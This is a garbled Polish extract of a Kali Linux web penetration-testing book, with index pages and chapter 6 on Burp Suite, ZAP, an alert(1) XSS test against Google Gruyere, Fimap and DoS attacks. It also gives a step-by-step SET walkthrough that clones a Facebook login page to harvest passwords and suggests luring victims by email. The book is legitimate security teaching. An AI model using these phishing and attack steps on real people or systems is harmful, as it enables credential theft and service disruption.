usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 17: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

